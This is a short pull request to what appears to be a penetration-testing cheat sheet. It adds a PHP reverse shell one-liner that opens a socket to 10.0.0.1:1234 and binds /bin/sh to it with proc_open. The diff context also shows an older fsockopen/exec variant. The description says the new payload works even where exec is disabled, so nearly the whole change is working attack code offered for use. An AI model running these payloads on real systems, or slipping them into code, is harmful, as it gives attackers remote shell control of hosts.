### PR TITLE
Added another PHP reverse shell payload

### DIFF
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md
@@ -107,6 +107,10 @@ C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('1
 php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
 ```
 
+```bash
+php -r '$sock=fsockopen("10.0.0.1",1234);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
+```
+
 ### Ruby
 
 ```ruby


### PR DESCRIPTION
This reverse shell payload for PHP works even if `exec` is disabled and/or the new socket is not on fd 3